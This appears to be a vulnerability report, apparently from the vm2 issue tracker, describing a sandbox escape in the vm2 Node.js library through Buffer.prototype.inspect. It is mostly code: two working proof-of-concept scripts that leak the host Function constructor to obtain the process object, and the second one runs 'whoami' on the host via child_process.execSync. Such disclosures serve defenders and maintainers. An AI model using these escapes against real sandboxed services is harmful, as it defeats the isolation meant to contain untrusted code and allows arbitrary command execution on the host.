Inspect Escape [Node.js 11.8.0]

[XmiliaH]

In version v11.8.0 of nodejs, but not in v10.15.0, the Buffer.prototype.inspect method was changed and can now read any user supplied property in the remote context and pass the result back to local vm context. This allows to read the constructor property of a function and pass the host constructor back to the vm. With the constructor you can then get the process and escape.

"use strict";
const {VM} = require('vm2');
const untrusted = `
var buffer = new Proxy(()=>{},{
	get:(target,key)=>key==="hexSlice"?()=>"":target[key],
	ownKeys:()=>["constructor"]
});
var ctx = {
		seen:{
			indexOf(v){
				throw v("return process")();
			}
		},showHidden:true
};
var process;
try{
	Buffer.prototype.inspect.call(buffer, 0, ctx);
}catch(e){
	process = e;
}
if(process===undefined){
	throw "Version to old";
}
process
`;
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}

fixed in node 12.9.0

[XmiliaH]

The specific code I used is fixed. However, (in v12.9.1) inspect can still be used to escape

"use strict";
const {VM} = require('vm2');
const untrusted = '(' + function(){
	var buffer = {
		hexSlice: ()=>"",
		magic: {
			get [Symbol.for("nodejs.util.inspect.custom")](){
				throw f=>f.constructor("return process")();
			}
		}
	};
	try{
		Buffer.prototype.inspect.call(buffer, 0, {customInspect:true});
	}catch(e){
		return e(()=>0).mainModule.require("child_process").execSync("whoami").toString();
	}
}+')()';
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}